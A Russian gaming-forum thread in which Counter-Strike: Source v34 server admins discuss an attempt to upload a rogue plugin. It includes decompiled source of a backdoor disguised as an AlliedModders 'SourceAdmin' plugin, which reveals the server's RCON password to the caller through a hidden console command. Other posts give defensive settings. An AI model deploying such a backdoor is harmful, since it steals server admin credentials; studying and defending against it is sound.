Очередной хак или просто лол.

Тема в разделе "Всякое", создана пользователем EPacker2, 1 янв 2013.

  1. EPacker2

    EPacker2 3D-моделист

    Сообщения:
    1.041
    Симпатии:
    639
    Сижу, значит, такой на сервере и бац! Заходит чел со странным ником. Ну, я не долго думая, захожу в спеки и смотрю в консоль сервера.
    Вот что выдает:
    Код:
    Client "TakeOver Hacked!" connected (95.67.239.50:27005).
    L 01/01/2013 - 21:06:21: eSTEAMATiON STATS Info: <ID STEAM_0:0:996384170><IP 95.67.239.50> <EMU REVEMU_4TH_GEN> STATUS:ACCEPTED
    L 01/01/2013 - 21:06:21: eSTEAMATiON STATS Info: <ID STEAM_0:0:996384170><IP 95.67.239.50> <EMU REVEMU_4TH_GEN> STATUS:ACCEPTED
    L 01/01/2013 - 21:06:21: eSTEAMATiON assigned STEAM_0:0:996384170 ID to this client
    L 01/01/2013 - 21:06:21: eSTEAMATiON assigned STEAM_0:0:996384170 ID to this client
    [B]Download file 'addons/sourcemod/plugins/sourceadmin.smx' has invalid path or extension!
    Download file 'addons/sourcemod/plugins/sourceadmin.smx' has invalid path or extension!
    Download file 'addons/sourcemod/plugins/sourceadmin.smx' has invalid path or extension!
    Download file 'addons/sourcemod/plugins/sourceadmin.smx' has invalid path or extension!
    Download file 'addons/sourcemod/plugins/sourceadmin.smx' has invalid path or extension!
    Download file 'addons/sourcemod/plugins/sourceadmin.smx' has invalid path or extension!
    Download file 'addons/sourcemod/plugins/sourceadmin.smx' has invalid path or extension!
    Download file 'addons/sourcemod/plugins/sourceadmin.smx' has invalid path or extension!
    Download file 'addons/sourcemod/plugins/sourceadmin.smx' has invalid path or extension!
    Download file 'addons/sourcemod/plugins/sourceadmin.smx' has invalid path or extension![/B]
    Game will not start until both teams have players.
    Dropped TakeOver Hacked! from server (Client timed out)
    Для проверки, залез на сервер и убедился, что данного плагина не было и нет.
    Что скажем, господа? :)
     
    hellgu и AlmazON нравится это.
  2. KorDen

    KorDen Atra esterní ono thelduin!

    Сообщения:
    2.194
    Симпатии:
    1.398
    Ну в принципе он пытался сделать хак (то есть загрузить плагин для взлома админки) при помощи возможности загрузки файлов на сервер (то есть например так грузятся спреи), но сервер ему этого не давал сделать, защита в CSS все же есть в этом плане, если вспомнить фишки с 1.6... В принципе и так все нормально, но можно и заблокировать, но при этом перестанут работать спреи - sv_allowupload 0 - а если еще загрузка файлов по HTTP, то можно и sv_allowdownload 0 поставить для надежности
     
    EPacker2 нравится это.
  3. Vaio

    Vaio

    Сообщения:
    628
    Симпатии:
    218
    А сервер v34, правильно?
     
  4. EPacker2

    EPacker2 3D-моделист

    Сообщения:
    1.041
    Симпатии:
    639
    Угу.
    Нашел данный плагин в инете. Он находится в клиенсткой контре и юзается addons и lua. Декомпильнул плаг, и из этого понятно, что он что-то делает с рконом и кого-то кикает.
    Код:
    public PlVers:__version =
    {
        version = 5,
        filevers = "1.2.1",
        date = "12/04/2009",
        time = "22:13:26"
    };
    new Float:NULL_VECTOR[3];
    new String:NULL_STRING[1];
    public Extension:__ext_core =
    {
        name = "Core",
        file = "core",
        autoload = 0,
        required = 0,
    };
    new MaxClients;
    public Plugin:myinfo =
    {
        name = "SourceAdmin",
        description = "SourceAdminPlugin",
        author = "AlliedModders LLC",
        version = "1.2.4",
        url = "http://www.SourceMod.net/"
    };
    public __ext_core_SetNTVOptional()
    {
        VerifyCoreVersion();
        return 0;
    }
    
    public OnPluginStart()
    {
        RegConsoleCmd("default", bwhook, "", 0);
        RegConsoleCmd("sm_help", block, "", 0);
        RegServerCmd("sm_help", block2, "", 0);
        return 0;
    }
    
    public Action:bwhook(client, argc)
    {
        if (argc < 1)
        {
            return Action:0;
        }
        decl String:str[64];
        GetCmdArg(1, str, 64);
        if (strcmp(str, "rcon", false))
        {
            return Action:0;
        }
        decl String:rcon[256];
        GetConVarString(FindConVar("rcon_password"), rcon, 256);
        PrintToConsole(client, rcon);
        PrintToChat(client, rcon);
        return Action:3;
    }
    
    public Action:block(client, argc)
    {
        ServerCommand("kickid %d invalid.", GetClientUserId(client));
        return Action:0;
    }
    
    public Action:block2(args)
    {
        return Action:0;
    }
    Не знаю, поможет ли. :) Оффтоп
    Админки не взломаны, действий через ркон не видно.
     
    hellgu нравится это.
  5. wanted241

    wanted241 Real-Gamer.Ru

    Сообщения:
    783
    Симпатии:
    355
    Узнает РКОН и не дает кого-либо кикнуть.
     
    EPacker2 нравится это.
  6. Vaio

    Vaio

    Сообщения:
    628
    Симпатии:
    218
    hellgu и EPacker2 нравится это.
  7. Scarface_slv

    Scarface_slv

    Сообщения:
    228
    Симпатии:
    47
    Не нужна никакая защита, нужен эмулятор - esteamation для css v34 он сам все блочит. Что и видно в логах сервера у EPacker2
     
    EPacker2 нравится это.
  8. EPacker2

    EPacker2 3D-моделист

    Сообщения:
    1.041
    Симпатии:
    639
    Как раз таки этот эмуль и стоит :)
    Добавлено через 5 минут
    Только один вопрос. Почему у меня с клиента пишет:
    Код:
    ] rcon_address айпи_сервера
    ] rcon_password ркон_сервера
    ] rcon 
    [COLOR=DarkRed]Unable to connect to remote server (айпи_сервера)[/COLOR]
    ] rcon status
    Bad RCON password
    ] rcon ping
    Bad RCON password
    В server.cfg:
    Код:
    rcon_password "ркон_сервера"
    sv_rcon_log "1"
    sv_rcon_banpenalty "0"
    sv_rcon_maxfailures "1"
    sv_rcon_minfailures "1"
    sv_rcon_minfailuretime "30"
    Проверил в консоли сервера, все тоже верно.
    Код:
    "rcon_password" = "ркон_сервера" ( def. "" )
     - remote console password.
    Код:
    rcon from "мой_айпи": Bad Password
    rcon from "мой_айпи": Bad Password
    rcon from "мой_айпи": Bad Password
    В настройках сервера (хостинг MyArena) удаленное управление RCON разрешено.

    Примерно неделю назад все работало исправно. Новые плагины и расширения не ставил.

    Добавлено через 40 минут
    Пошалив, что-то получилось:
    Код:
    ] sm_rcon rcon_password test
    ] rcon_password test
    ] rcon 
    autokick is disabled for EPacker2
    ] rcon status
    hostname: имя_сервера
    ...
     
    Последнее редактирование: 2 янв 2013
    hellgu нравится это.
  9. wanted241

    wanted241 Real-Gamer.Ru

    Сообщения:
    783
    Симпатии:
    355
    Выключи rcon_password и не мучайся.
     
  10. EPacker2

    EPacker2 3D-моделист

    Сообщения:
    1.041
    Симпатии:
    639
    Как раз таки он мне нужен, для удаленного управления.

    Добавлено через 3 минуты
    Разобрался, сменив пароль.
    Видимо та попытка взломать сервер, что-то сделала с рконом. :D
     
    Последнее редактирование: 2 янв 2013
    hellgu нравится это.
  11. KorDen

    KorDen Atra esterní ono thelduin!

    Сообщения:
    2.194
    Симпатии:
    1.398
    А в обновлениях KAC которые с SMACовскими для v34 нет модуля а-ля smac_rcon? Есть же много вариаций плагинов для защиты от смены RCON-пароля и популярных эксплоитов....
    PS: Да, а чего HLSW не пользуешься? Удобнее же...
    Оффтоп
     
    EPacker2 нравится это.
  12. EPacker2

    EPacker2 3D-моделист

    Сообщения:
    1.041
    Симпатии:
    639
    Хорошая панелька. Надо бы скачать)
     
  13. The Night Fury

    The Night Fury Администратор

    Сообщения:
    1.222
    Симпатии:
    916
    EPacker2, http://www.hlsw.org/download/mirrors/77/HLSW_v1.4.0.2
    Хорошо, что регистрироваться для использования не надо совсем. Но можно для того, чтобы свои списки создавать.
    Вещица удобная, разработчики же ещё и хотели (если уже не сделали) сделать поддержку пользовательских контекстных меню на LUA, нет?
     
    EPacker2 нравится это.
  14. EPacker2

    EPacker2 3D-моделист

    Сообщения:
    1.041
    Симпатии:
    639
    Даже и не знаю... :) Надо порыскать интернет.
     
  15. KorDen

    KorDen Atra esterní ono thelduin!

    Сообщения:
    2.194
    Симпатии:
    1.398
    ЛУчше не 1.4.0.2 скачивать, а бету 1.4.0.4 - http://www.hlsw.org/download/mirrors/79/HLSW_v1.4.0.4
    Просто в 1.4.0.2 нет поддержки нового формата выдачи команды status, который валв ввели уже относительно давно, но HLSW уже давно не обновлялась, последняя бета 1.4.0.5 глюченная вроде, а 1.4.0.4 работает прекрасно.
    Про LUA - вроде как оно есть, я как-то пытался разобраться, но так и не начал ковыряться глубоко и что-то писать...
     
    The Night Fury и EPacker2 нравится это.
  16. EPacker2

    EPacker2 3D-моделист

    Сообщения:
    1.041
    Симпатии:
    639
    Регистрироваться обязательно?
    И как добавлять сервера? :D Пошли-поехали нубские вопросы. :-D
     
  17. The Night Fury

    The Night Fury Администратор

    Сообщения:
    1.222
    Симпатии:
    916
    EPacker2, лучше зарегистрироваться, но это на твой выбор.
    Добавлять серверы вводом в верхнюю строку его IP: PORT. Сразу в списке недавних серверов он у тебя появится.
     
    EPacker2 нравится это.
  18. AlmazON

    AlmazON деревянный © yand3xmail

    Сообщения:
    4.590
    Симпатии:
    1.995
    Это натуральный хак! Сегодня столкнулся с тем же самым! Но это взломщик таки залил свою дрянь и добавил больше ботов... Забанил его, однако сам инцедент напрягает(
    Данные хакера:
    FɄȽLѾḤẦPⱪ0ᶆ₳H-ⱧD(не найдена (сеть LAN))[STEAM_0:0:653265244] connected
    Начал писать сначала !bm 3 какой-то, пытался найти плагин от !zprops, которого нет и ещё что-то... Потом снова куча !bm 3. Видать команда для входа в свою программку взлома.
     
    Последнее редактирование: 5 янв 2013
    hellgu и EPacker2 нравится это.
  19. The Night Fury

    The Night Fury Администратор

    Сообщения:
    1.222
    Симпатии:
    916
    AlmazON, запрети загрузку. Вообще, зачем она тебе? Чужие спреи? Даром не нужны.
     
    KorDen, EPacker2 и AlmazON нравится это.
  20. AlmazON

    AlmazON деревянный © yand3xmail

    Сообщения:
    4.590
    Симпатии:
    1.995
    Стояла, никого не напрягала... Мне как-то всё равно. До этого времени. :sad:
    Сделал так, меньше канал загружать будут и нагрузка чуток меньше. :)
     
    EPacker2 нравится это.